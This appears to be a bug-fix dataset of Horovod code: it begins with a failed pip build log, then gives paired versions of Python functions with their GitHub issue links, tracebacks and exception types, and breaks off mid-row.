gcc -pthread -Wno-unused-result -Wsign-compare -DNDEBUG -g -fwrapv -O3 -Wall -fPIC -std=c++11 -fPIC -O2 -Wall -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/include -I/home/wyz/.pyenv/versions/3.7.2/include/python3.7m -c build/temp.linux-x86_64-3.7/test_compile/test_cpp_flags.cc -o build/temp.linux-x86_64-3.7/test_compile/test_cpp_flags.o
gcc -pthread -shared -L/home/wyz/.pyenv/versions/3.7.2/lib -L/home/wyz/.pyenv/versions/3.7.2/lib build/temp.linux-x86_64-3.7/test_compile/test_cpp_flags.o -o build/temp.linux-x86_64-3.7/test_compile/test_cpp_flags.so
gcc -pthread -Wno-unused-result -Wsign-compare -DNDEBUG -g -fwrapv -O3 -Wall -fPIC -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/include -I/home/wyz/.pyenv/versions/3.7.2/include/python3.7m -c build/temp.linux-x86_64-3.7/test_compile/test_link_flags.cc -o build/temp.linux-x86_64-3.7/test_compile/test_link_flags.o
gcc -pthread -shared -L/home/wyz/.pyenv/versions/3.7.2/lib -L/home/wyz/.pyenv/versions/3.7.2/lib -Wl,--version-script=horovod.lds build/temp.linux-x86_64-3.7/test_compile/test_link_flags.o -o build/temp.linux-x86_64-3.7/test_compile/test_link_flags.so
INFO: Unable to build TensorFlow plugin, will skip it.
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 72, in check_tf_version
import tensorflow as tf
ModuleNotFoundError: No module named 'tensorflow'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1375, in build_extensions
build_tf_extension(self, options)
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 851, in build_tf_extension
check_tf_version()
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 79, in check_tf_version
'import tensorflow failed, is it installed?\n\n%s' % traceback.format_exc())
distutils.errors.DistutilsPlatformError: import tensorflow failed, is it installed?
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 72, in check_tf_version
import tensorflow as tf
ModuleNotFoundError: No module named 'tensorflow'
gcc -pthread -Wno-unused-result -Wsign-compare -DNDEBUG -g -fwrapv -O3 -Wall -fPIC -std=c++11 -fPIC -O2 -Wall -I/usr/local/include -pthread -Wl,-rpath -Wl,/usr/local/lib -Wl,--enable-new-dtags -L/usr/local/lib -lmpi -I/usr/local/include -pthread -Wl,-rpath -Wl,/usr/local/lib -Wl,--enable-new-dtags -L/usr/local/lib -lmpi -Ithird_party/HTTPRequest/include -Ithird_party/boost/assert/include -Ithird_party/boost/config/include -Ithird_party/boost/core/include -Ithird_party/boost/detail/include -Ithird_party/boost/iterator/include -Ithird_party/boost/lockfree/include -Ithird_party/boost/mpl/include -Ithird_party/boost/parameter/include -Ithird_party/boost/predef/include -Ithird_party/boost/preprocessor/include -Ithird_party/boost/static_assert/include -Ithird_party/boost/type_traits/include -Ithird_party/boost/utility/include -Ithird_party/eigen -Ithird_party/flatbuffers/include -Ithird_party/lbfgs/include -Ithird_party/gloo -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages/torch/include -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages/torch/include/torch/csrc/api/include -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages/torch/include/TH -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages/torch/include/THC -I/usr/local/cuda/include -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/include -I/home/wyz/.pyenv/versions/3.7.2/include/python3.7m -c build/temp.linux-x86_64-3.7/test_compile/test_torch_cuda.cc -o build/temp.linux-x86_64-3.7/test_compile/test_torch_cuda.o
gcc -pthread -shared -L/home/wyz/.pyenv/versions/3.7.2/lib -L/home/wyz/.pyenv/versions/3.7.2/lib build/temp.linux-x86_64-3.7/test_compile/test_torch_cuda.o -o build/temp.linux-x86_64-3.7/test_compile/test_torch_cuda.so
/bin/sh: 1: /usr/lib/gcc: Permission denied
INFO: Unable to determine version of the compiler /usr/lib/gcc.
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 767, in determine_gcc_version
shell=True, universal_newlines=True).split('\n')
File "/home/wyz/.pyenv/versions/3.7.2/lib/python3.7/subprocess.py", line 395, in check_output
**kwargs).stdout
File "/home/wyz/.pyenv/versions/3.7.2/lib/python3.7/subprocess.py", line 487, in run
output=stdout, stderr=stderr)
subprocess.CalledProcessError: Command '/usr/lib/gcc -dM -E - </dev/null' returned non-zero exit status 126.
INFO: Unable to build PyTorch plugin, will skip it.
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1389, in build_extensions
build_torch_extension_v2(self, options, torch_version)
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1274, in build_torch_extension_v2
find_matching_gcc_compiler_path(candidate_compiler_version)
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 801, in find_matching_gcc_compiler_path
if compiler_version == gxx_compiler_version:
File "/home/wyz/.pyenv/versions/3.7.2/lib/python3.7/distutils/version.py", line 46, in __eq__
c = self._cmp(other)
File "/home/wyz/.pyenv/versions/3.7.2/lib/python3.7/distutils/version.py", line 335, in _cmp
if self.version == other.version:
AttributeError: 'NoneType' object has no attribute 'version'
-- The CXX compiler identification is GNU 7.4.0
-- The C compiler identification is GNU 7.4.0
-- Check for working CXX compiler: /usr/bin/c++
-- Check for working CXX compiler: /usr/bin/c++ -- works
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Check for working C compiler: /usr/bin/cc
-- Check for working C compiler: /usr/bin/cc -- works
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Detecting C compile features
-- Detecting C compile features - done
-- Found MPI_C: /usr/local/lib/libmpi.so (found version "3.1")
-- Found MPI_CXX: /usr/local/lib/libmpi.so (found version "3.1")
-- Found MPI: TRUE (found version "3.1")
-- MPI include path: /usr/local/include
-- MPI libraries: /usr/local/lib/libmpi.so
-- Configuring done
-- Generating done
-- Build files have been written to: /tmp/pip-install-c74kecsx/horovod/build/temp.linux-x86_64-3.7/gloo/mxnet
Scanning dependencies of target gloo
[ 6%] Building CXX object gloo/CMakeFiles/gloo.dir/allreduce.cc.o
[ 6%] Building CXX object gloo/CMakeFiles/gloo.dir/allgather.cc.o
[ 9%] Building CXX object gloo/CMakeFiles/gloo.dir/algorithm.cc.o
[ 12%] Building CXX object gloo/CMakeFiles/gloo.dir/allgatherv.cc.o
[ 15%] Building CXX object gloo/CMakeFiles/gloo.dir/allreduce_local.cc.o
[ 18%] Building CXX object gloo/CMakeFiles/gloo.dir/barrier.cc.o
[ 21%] Building CXX object gloo/CMakeFiles/gloo.dir/broadcast.cc.o
[ 24%] Building CXX object gloo/CMakeFiles/gloo.dir/context.cc.o
[ 27%] Building CXX object gloo/CMakeFiles/gloo.dir/gather.cc.o
[ 30%] Building CXX object gloo/CMakeFiles/gloo.dir/reduce.cc.o
[ 33%] Building CXX object gloo/CMakeFiles/gloo.dir/scatter.cc.o
[ 36%] Building CXX object gloo/CMakeFiles/gloo.dir/types.cc.o
[ 39%] Building CXX object gloo/CMakeFiles/gloo.dir/common/linux.cc.o
[ 42%] Building CXX object gloo/CMakeFiles/gloo.dir/common/logging.cc.o
[ 45%] Building CXX object gloo/CMakeFiles/gloo.dir/mpi/context.cc.o
[ 48%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/context.cc.o
[ 51%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/file_store.cc.o
In file included from /tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/mpi/context.cc:16:0:
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/mpi/context.cc: In destructor ‘gloo::mpi::MPIScope::~MPIScope()’:
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/common/logging.h:141:58: warning: throw will always call terminate() [-Wterminate]
r.get_message_and_free(MakeString(__VA_ARGS__))); \
^
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/common/logging.h:150:3: note: in expansion of macro ‘GLOO_ENFORCE_THAT_IMPL’
GLOO_ENFORCE_THAT_IMPL(Equals((x), (y)), #x " == " #y, __VA_ARGS__)
^~~~~~~~~~~~~~~~~~~~~~
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/mpi/context.cc:43:3: note: in expansion of macro ‘GLOO_ENFORCE_EQ’
GLOO_ENFORCE_EQ(rv, MPI_SUCCESS);
^~~~~~~~~~~~~~~
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/common/logging.h:141:58: note: in C++11 destructors default to noexcept
r.get_message_and_free(MakeString(__VA_ARGS__))); \
^
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/common/logging.h:150:3: note: in expansion of macro ‘GLOO_ENFORCE_THAT_IMPL’
GLOO_ENFORCE_THAT_IMPL(Equals((x), (y)), #x " == " #y, __VA_ARGS__)
^~~~~~~~~~~~~~~~~~~~~~
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/mpi/context.cc:43:3: note: in expansion of macro ‘GLOO_ENFORCE_EQ’
GLOO_ENFORCE_EQ(rv, MPI_SUCCESS);
^~~~~~~~~~~~~~~
[ 54%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/hash_store.cc.o
[ 57%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/prefix_store.cc.o
[ 60%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/store.cc.o
[ 63%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/address.cc.o
[ 66%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/buffer.cc.o
[ 69%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/context.cc.o
[ 72%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/device.cc.o
[ 75%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/pair.cc.o
[ 78%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/unbound_buffer.cc.o
[ 81%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/address.cc.o
[ 84%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/buffer.cc.o
[ 87%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/context.cc.o
[ 90%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/device.cc.o
[ 93%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/pair.cc.o
[ 96%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/unbound_buffer.cc.o
[100%] Linking CXX static library /tmp/pip-install-c74kecsx/horovod/build/temp.linux-x86_64-3.7/lib/mxnet/libgloo.a
[100%] Built target gloo
INFO: Unable to build MXNet plugin, will skip it.
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 88, in check_mx_version
import mxnet as mx
ModuleNotFoundError: No module named 'mxnet'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1403, in build_extensions
build_mx_extension(self, options)
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1000, in build_mx_extension
check_mx_version()
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 95, in check_mx_version
'import mxnet failed, is it installed?\n\n%s' % traceback.format_exc())
distutils.errors.DistutilsPlatformError: import mxnet failed, is it installed?
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 88, in check_mx_version
import mxnet as mx
ModuleNotFoundError: No module named 'mxnet'
error: None of TensorFlow, PyTorch, or MXNet plugins were built. See errors above.
----------------------------------------
Command "/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/bin/python3.7 -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-c74kecsx/horovod/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /tmp/pip-record-zuqdc9ob/install-record.txt --single-version-externally-managed --compile --install-headers /home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/include/site/python3.7/horovod" failed with error code 1 in /tmp/pip-install-c74kecsx/horovod/
|
ModuleNotFoundError
|
def run():
args = parse_args()
# if hosts are not specified, either parse from hostfile, or default as
# localhost
if not args.hosts:
if args.hostfile:
args.hosts = parse_host_files(args.hostfile)
else:
# Set hosts to localhost if not specified
args.hosts = "localhost:{np}".format(np=args.np)
host_list = args.hosts.split(",")
all_host_names = []
pattern = re.compile(r"^[\w.-]+:\d+$")
for host in host_list:
if not pattern.match(host.strip()):
raise ValueError(
"Invalid host input, please make sure it has "
"format as : worker-0:2,worker-1:2."
)
all_host_names.append(host.strip().split(":")[0])
# horovodrun has to finish all the checks before this timeout runs out.
if args.start_timeout:
start_timeout = args.start_timeout
else:
# Lookup default timeout from the environment variable.
start_timeout = int(os.getenv("HOROVOD_START_TIMEOUT", "30"))
tmout = timeout.Timeout(
start_timeout,
message="Timed out waiting for {activity}. Please "
"check connectivity between servers. You "
"may need to increase the --start-timeout "
"parameter if you have too many servers.",
)
settings = hvd_settings.Settings(
verbose=2 if args.verbose else 0,
ssh_port=args.ssh_port,
key=secret.make_secret_key(),
timeout=tmout,
num_hosts=len(all_host_names),
num_proc=args.np,
hosts=args.hosts,
command=args.command,
)
# This cache stores the results of checks performed by horovodrun
# during the initialization step. It can be disabled by setting
# --disable-cache flag.
fn_cache = None
if not args.disable_cache:
params = ""
if args.np:
params += str(args.np) + " "
if args.hosts:
params += str(args.hosts) + " "
if args.ssh_port:
params += str(args.ssh_port)
parameters_hash = hashlib.md5(params.encode("utf-8")).hexdigest()
fn_cache = cache.Cache(
CACHE_FOLDER, CACHE_STALENESS_THRESHOLD_MINUTES, parameters_hash
)
if settings.verbose >= 2:
print("Filtering local host names.")
remote_host_names = network.filter_local_addresses(all_host_names)
if settings.verbose >= 2:
print("Remote host found: " + " ".join(remote_host_names))
if len(remote_host_names) > 0:
if settings.verbose >= 2:
print("Checking ssh on all remote hosts.")
# Check if we can ssh into all remote hosts successfully.
_check_all_hosts_ssh_successful(
remote_host_names, args.ssh_port, fn_cache=fn_cache
)
if settings.verbose >= 2:
print("SSH was successful into all the remote hosts.")
if len(remote_host_names) > 0:
if settings.verbose >= 2:
print("Testing interfaces on all the hosts.")
local_host_names = set(all_host_names) - set(remote_host_names)
# Find the set of common, routed interfaces on all the hosts (remote
# and local) and specify it in the args to be used by NCCL. It is
# expected that the following function will find at least one interface
# otherwise, it will raise an exception.
common_intfs = _driver_fn(
all_host_names, local_host_names, settings, fn_cache=fn_cache
)
if settings.verbose >= 2:
print("Interfaces on all the hosts were successfully checked.")
print("Common interface found: " + " ".join(common_intfs))
else:
if settings.verbose >= 2:
print("All hosts are local, finding the interfaces with address 127.0.0.1")
# If all the given hosts are local, find the interfaces with address
# 127.0.0.1
common_intfs = set()
for iface, addrs in net_if_addrs().items():
for addr in addrs:
if addr.family == AF_INET and addr.address == "127.0.0.1":
common_intfs.add(iface)
break
if len(common_intfs) == 0:
raise ValueError("No interface is found for address 127.0.0.1.")
if settings.verbose >= 2:
print("Local interface found " + " ".join(common_intfs))
if args.use_gloo:
if not gloo_built():
raise ValueError(
"Gloo support has not been built. If this is not expected, ensure CMake is installed "
"and reinstall Horovod with HOROVOD_WITH_GLOO=1 to debug the build error."
)
gloo_run(settings, remote_host_names, common_intfs)
elif args.use_mpi:
if not mpi_built():
raise ValueError(
"MPI support has not been built. If this is not expected, ensure MPI is installed "
"and reinstall Horovod with HOROVOD_WITH_MPI=1 to debug the build error."
)
mpi_run(settings, common_intfs)
else:
if mpi_built():
mpi_run(settings, common_intfs)
elif gloo_built():
gloo_run(settings, remote_host_names, common_intfs)
else:
raise ValueError(
"Neither MPI nor Gloo support has been built. Try reinstalling Horovod ensuring that "
"either MPI is installed (MPI) or CMake is installed (Gloo)."
)
|
def run():
args = parse_args()
# if hosts are not specified, either parse from hostfile, or default as
# localhost
if not args.hosts:
if args.hostfile:
args.hosts = parse_host_files(args.hostfile)
else:
# Set hosts to localhost if not specified
args.hosts = "localhost:{np}".format(np=args.np)
host_list = args.hosts.split(",")
all_host_names = []
pattern = re.compile(r"^[\w-]+:\d+$")
for host in host_list:
if not pattern.match(host.strip()):
raise ValueError(
"Invalid host input, please make sure it has "
"format as : worker-0:2,worker-1:2."
)
all_host_names.append(host.strip().split(":")[0])
# horovodrun has to finish all the checks before this timeout runs out.
if args.start_timeout:
start_timeout = args.start_timeout
else:
# Lookup default timeout from the environment variable.
start_timeout = int(os.getenv("HOROVOD_START_TIMEOUT", "30"))
tmout = timeout.Timeout(
start_timeout,
message="Timed out waiting for {activity}. Please "
"check connectivity between servers. You "
"may need to increase the --start-timeout "
"parameter if you have too many servers.",
)
settings = hvd_settings.Settings(
verbose=2 if args.verbose else 0,
ssh_port=args.ssh_port,
key=secret.make_secret_key(),
timeout=tmout,
num_hosts=len(all_host_names),
num_proc=args.np,
hosts=args.hosts,
command=args.command,
)
# This cache stores the results of checks performed by horovodrun
# during the initialization step. It can be disabled by setting
# --disable-cache flag.
fn_cache = None
if not args.disable_cache:
params = ""
if args.np:
params += str(args.np) + " "
if args.hosts:
params += str(args.hosts) + " "
if args.ssh_port:
params += str(args.ssh_port)
parameters_hash = hashlib.md5(params.encode("utf-8")).hexdigest()
fn_cache = cache.Cache(
CACHE_FOLDER, CACHE_STALENESS_THRESHOLD_MINUTES, parameters_hash
)
if settings.verbose >= 2:
print("Filtering local host names.")
remote_host_names = network.filter_local_addresses(all_host_names)
if settings.verbose >= 2:
print("Remote host found: " + " ".join(remote_host_names))
if len(remote_host_names) > 0:
if settings.verbose >= 2:
print("Checking ssh on all remote hosts.")
# Check if we can ssh into all remote hosts successfully.
_check_all_hosts_ssh_successful(
remote_host_names, args.ssh_port, fn_cache=fn_cache
)
if settings.verbose >= 2:
print("SSH was successful into all the remote hosts.")
if len(remote_host_names) > 0:
if settings.verbose >= 2:
print("Testing interfaces on all the hosts.")
local_host_names = set(all_host_names) - set(remote_host_names)
# Find the set of common, routed interfaces on all the hosts (remote
# and local) and specify it in the args to be used by NCCL. It is
# expected that the following function will find at least one interface
# otherwise, it will raise an exception.
common_intfs = _driver_fn(
all_host_names, local_host_names, settings, fn_cache=fn_cache
)
if settings.verbose >= 2:
print("Interfaces on all the hosts were successfully checked.")
print("Common interface found: " + " ".join(common_intfs))
else:
if settings.verbose >= 2:
print("All hosts are local, finding the interfaces with address 127.0.0.1")
# If all the given hosts are local, find the interfaces with address
# 127.0.0.1
common_intfs = set()
for iface, addrs in net_if_addrs().items():
for addr in addrs:
if addr.family == AF_INET and addr.address == "127.0.0.1":
common_intfs.add(iface)
break
if len(common_intfs) == 0:
raise ValueError("No interface is found for address 127.0.0.1.")
if settings.verbose >= 2:
print("Local interface found " + " ".join(common_intfs))
if args.use_gloo:
if not gloo_built():
raise ValueError(
"Gloo support has not been built. If this is not expected, ensure CMake is installed "
"and reinstall Horovod with HOROVOD_WITH_GLOO=1 to debug the build error."
)
gloo_run(settings, remote_host_names, common_intfs)
elif args.use_mpi:
if not mpi_built():
raise ValueError(
"MPI support has not been built. If this is not expected, ensure MPI is installed "
"and reinstall Horovod with HOROVOD_WITH_MPI=1 to debug the build error."
)
mpi_run(settings, common_intfs)
else:
if mpi_built():
mpi_run(settings, common_intfs)
elif gloo_built():
gloo_run(settings, remote_host_names, common_intfs)
else:
raise ValueError(
"Neither MPI nor Gloo support has been built. Try reinstalling Horovod ensuring that "
"either MPI is installed (MPI) or CMake is installed (Gloo)."
)
|
https://github.com/horovod/horovod/issues/1325
|
# horovodrun --verbose -np 1 -H 10.0.0.3:1 -p 12345 python /horovod/examples/keras_mnist.py
Traceback (most recent call last):
File "/usr/local/bin/horovodrun", line 21, in <module>
run.run()
File "/usr/local/lib/python3.6/dist-packages/horovod/run/run.py", line 396, in run
raise ValueError('Invalid host input, please make sure it has '
ValueError: Invalid host input, please make sure it has format as : worker-0:2,worker-1:2.
|
ValueError
|
def train(epoch):
model.train()
train_sampler.set_epoch(epoch)
train_loss = Metric("train_loss")
train_accuracy = Metric("train_accuracy")
with tqdm(
total=len(train_loader),
desc="Train Epoch #{}".format(epoch + 1),
disable=not verbose,
) as t:
for batch_idx, (data, target) in enumerate(train_loader):
adjust_learning_rate(epoch, batch_idx)
if args.cuda:
data, target = data.cuda(), target.cuda()
optimizer.zero_grad()
# Split data into sub-batches of size batch_size
for i in range(0, len(data), args.batch_size):
data_batch = data[i : i + args.batch_size]
target_batch = target[i : i + args.batch_size]
output = model(data_batch)
train_accuracy.update(accuracy(output, target_batch))
loss = F.cross_entropy(output, target_batch)
train_loss.update(loss)
# Average gradients among sub-batches
loss.div_(math.ceil(float(len(data)) / args.batch_size))
loss.backward()
# Gradient is applied across all ranks
optimizer.step()
t.set_postfix(
{
"loss": train_loss.avg.item(),
"accuracy": 100.0 * train_accuracy.avg.item(),
}
)
t.update(1)
if log_writer:
log_writer.add_scalar("train/loss", train_loss.avg, epoch)
log_writer.add_scalar("train/accuracy", train_accuracy.avg, epoch)
|
def train(epoch):
model.train()
train_sampler.set_epoch(epoch)
train_loss = Metric("train_loss")
train_accuracy = Metric("train_accuracy")
with tqdm(
total=len(train_loader),
desc="Train Epoch #{}".format(epoch + 1),
disable=not verbose,
) as t:
for batch_idx, (data, target) in enumerate(train_loader):
adjust_learning_rate(epoch, batch_idx)
if args.cuda:
data, target = data.cuda(), target.cuda()
optimizer.zero_grad()
# Split data into sub-batches of size batch_size
for i in range(0, len(data), args.batch_size):
data_batch = data[i : i + args.batch_size]
target_batch = target[i : i + args.batch_size]
output = model(data_batch)
train_accuracy.update(accuracy(output, target_batch))
loss = F.cross_entropy(output, target_batch)
train_loss.update(loss.item())
# Average gradients among sub-batches
loss.div_(math.ceil(float(len(data)) / args.batch_size))
loss.backward()
# Gradient is applied across all ranks
optimizer.step()
t.set_postfix(
{
"loss": train_loss.avg.item(),
"accuracy": 100.0 * train_accuracy.avg.item(),
}
)
t.update(1)
if log_writer:
log_writer.add_scalar("train/loss", train_loss.avg, epoch)
log_writer.add_scalar("train/accuracy", train_accuracy.avg, epoch)
|
https://github.com/horovod/horovod/issues/852
|
Train Epoch #1: 0%| | 0/10010 [00:00<?, ?it/s]Traceback (most recent call last):
File "main_hvd.py", line 272, in <module>
train(epoch)
File "main_hvd.py", line 179, in train
train_loss.update(loss.item())
File "main_hvd.py", line 263, in update
self.sum += hvd.allreduce(val.detach().cpu(), name=self.name)
AttributeError: 'float' object has no attribute 'detach'
|
AttributeError
|
def broadcast_optimizer_state(optimizer, root_rank):
"""
Broadcasts an optimizer state from root rank to all other processes.
Arguments:
optimizer: An optimizer.
root_rank: The rank of the process from which the optimizer will be
broadcasted to all other processes.
"""
if isinstance(optimizer, torch.optim.LBFGS):
# TODO(travis): L-BFGS cannot be easily supported without serializing
# the entire state_dict, as its structure is deeply nested and contains
# None type parameter values
raise ValueError("cannot broadcast torch.optim.LBFGS state")
state_dict = optimizer.state_dict()
# Newly created optimizers will not have their state initialized, so
# do that initialization here
if len(state_dict["state"]) == 0:
for group in optimizer.param_groups:
for p in group["params"]:
p.grad = p.data.new(p.size()).zero_()
# This function accepts a torch.optim.Optimizer or a DistributedOptimizer
# wrapped around a torch optimizer. Calling step() with a DistributedOptimizer
# forces allreduce on all model parameters, which will result in deadlock
# unless every rank calls step(). Therefore, to finish state initialization
# only call optimizer.step() with a torch.optim.Optimizer.
if optimizer.__module__ == DistributedOptimizer.__module__:
super(optimizer.__class__, optimizer).step()
else:
optimizer.step()
state_dict = optimizer.state_dict()
# If the state_dict is still empty after initialization, then
# the optimizer is stateless, and there is nothing to broadcast.
# Furthermore, attempting to access the state dict would result in
# an error.
if len(state_dict["state"]) == 0:
return
params = []
callbacks = {}
occurrences = collections.defaultdict(int)
# Returns the full type structure of the possibly nested objects for recursive casting back
def _get_types(x):
if isinstance(x, collections.Iterable):
return type(x), [_get_types(xi) for xi in x]
else:
return type(x)
# Casts an object encoded in a tensor back into its original type and subtypes
def _recursive_cast(x, dtype):
if isinstance(dtype, tuple):
t, dtypes = dtype
x = t(x)
return t([_recursive_cast(x[i], dtypes[i]) for i in range(len(x))])
else:
return dtype(x)
# Some optimizer parameters may be represented as scalars instead of
# tensors. In such cases, we need to wrap the scalar in a tensor, then
# broadcast, then update the appropriate value in the state_dict with the
# new unwrapped scalar value via a callback.
def _create_callback(pid, name, t, p):
def _from_tensor():
state_dict["state"][pid][name] = t(p.numpy()[0])
return _from_tensor
def _create_option_callback(index, option_key, option_tensor, dtypes):
def _from_tensor():
optimizer.param_groups[index][option_key] = _recursive_cast(
option_tensor.numpy()[0], dtypes
)
return _from_tensor
# Param groups are an ordered list, normally there is only one per model,
# but users can add additional param groups for example to train
# previously frozen layers
for index, group in enumerate(state_dict["param_groups"]):
# Broadcast options like learning rate
for option_key, option_value in group.items():
if option_key == "params":
continue
# Options like the learning rate are scalar, and need to be wrapped in tensors
key = "%s.%d" % (option_key, index)
dtypes = _get_types(option_value)
option_tensor = torch.Tensor([option_value])
callbacks[key] = _create_option_callback(
index, option_key, option_tensor, dtypes
)
params.append((key, option_tensor))
# The params list here is ordered by the layers in the model
for pid in group["params"]:
param_state = state_dict["state"][pid]
for name, p in param_state.items():
# Some parameter names may appear more than once, in which
# case we ensure they have a unique identifier defined by
# their order
occurrences[name] += 1
key = "%s.%d" % (str(name), occurrences[name])
if not torch.is_tensor(p):
# Wrap the scalar in a FloatTensor, and remember its type
# so we can cast it back after unwrapping
t = type(p)
p = torch.Tensor([p])
callbacks[key] = _create_callback(pid, name, t, p)
params.append((key, p))
# Synchronized broadcast of all parameters
broadcast_parameters(params, root_rank)
# Post-broadcast clenaup for non-tensor parameters
for key, p in params:
if key in callbacks:
callbacks[key]()
|
def broadcast_optimizer_state(optimizer, root_rank):
"""
Broadcasts an optimizer state from root rank to all other processes.
Arguments:
optimizer: An optimizer.
root_rank: The rank of the process from which the optimizer will be
broadcasted to all other processes.
"""
if isinstance(optimizer, torch.optim.LBFGS):
# TODO(travis): L-BFGS cannot be easily supported without serializing
# the entire state_dict, as its structure is deeply nested and contains
# None type parameter values
raise ValueError("cannot broadcast torch.optim.LBFGS state")
state_dict = optimizer.state_dict()
# Newly created optimizers will not have their state initialized, so
# do that initialization here
if len(state_dict["state"]) == 0:
for group in optimizer.param_groups:
for p in group["params"]:
p.grad = p.data.new(p.size()).zero_()
# This function accepts a torch.optim.Optimizer or a DistributedOptimizer
# wrapped around a torch optimizer. Calling step() with a DistributedOptimizer
# forces allreduce on all model parameters, which will result in deadlock
# unless every rank calls step(). Therefore, to finish state initialization
# only call optimizer.step() with a torch.optim.Optimizer.
if optimizer.__module__ == DistributedOptimizer.__module__:
super(optimizer.__class__, optimizer).step()
else:
optimizer.step()
state_dict = optimizer.state_dict()
# If the state_dict is still empty after initialization, then
# the optimizer is stateless, and there is nothing to broadcast.
# Furthermore, attempting to access the state dict would result in
# an error.
if len(state_dict["state"]) == 0:
return
params = []
callbacks = {}
occurrences = collections.defaultdict(int)
# Some optimizer parameters may be represented as scalars instead of
# tensors. In such cases, we need to wrap the scalar in a tensor, then
# broadcast, then update the appropriate value in the state_dict with the
# new unwrapped scalar value via a callback.
def _create_callback(pid, name, t, p):
def _from_tensor():
state_dict["state"][pid][name] = t(p.numpy()[0])
return _from_tensor
def _create_option_callback(index, option_key, option_tensor, dtype):
def _from_tensor():
optimizer.param_groups[index][option_key] = dtype(option_tensor.numpy()[0])
return _from_tensor
# Param groups are an ordered list, normally there is only one per model,
# but users can add additional param groups for example to train
# previously frozen layers
for index, group in enumerate(state_dict["param_groups"]):
# Broadcast options like learning rate
for option_key, option_value in group.items():
if option_key == "params":
continue
# Options like the learning rate are scalar, and need to be wrapped in tensors
key = "%s.%d" % (option_key, index)
dtype = type(option_value)
option_tensor = torch.Tensor([option_value])
callbacks[key] = _create_option_callback(
index, option_key, option_tensor, dtype
)
params.append((key, option_tensor))
# The params list here is ordered by the layers in the model
for pid in group["params"]:
param_state = state_dict["state"][pid]
for name, p in param_state.items():
# Some parameter names may appear more than once, in which
# case we ensure they have a unique identifier defined by
# their order
occurrences[name] += 1
key = "%s.%d" % (str(name), occurrences[name])
if not torch.is_tensor(p):
# Wrap the scalar in a FloatTensor, and remember its type
# so we can cast it back after unwrapping
t = type(p)
p = torch.Tensor([p])
callbacks[key] = _create_callback(pid, name, t, p)
params.append((key, p))
# Synchronized broadcast of all parameters
broadcast_parameters(params, root_rank)
# Post-broadcast clenaup for non-tensor parameters
for key, p in params:
if key in callbacks:
callbacks[key]()
|
https://github.com/horovod/horovod/issues/605
|
Traceback (most recent call last):
File "train.py", line 641, in <module>
train_images(hps)
File "train.py", line 444, in train_images
train_step(batch, batch_idx, epoch, hps, model, opt, train_logger)
File "train.py", line 457, in train_step
opt.step()
File "/opt/conda/lib/python3.6/site-packages/horovod/torch/__init__.py", line 97, in step
return super(self.__class__, self).step(closure)
File "/opt/conda/lib/python3.6/site-packages/torch/optim/adamax.py", line 75, in step
exp_avg.mul_(beta1).add_(1 - beta1, grad)
TypeError: mul_() received an invalid combination of arguments - got (numpy.float32), but expected one of:
* (Tensor other)
didn't match because some of the arguments have invalid types: (numpy.float32)
* (float other)
didn't match because some of the arguments have invalid types: (numpy.float32)
|
TypeError
|
def _create_option_callback(index, option_key, option_tensor, dtypes):
def _from_tensor():
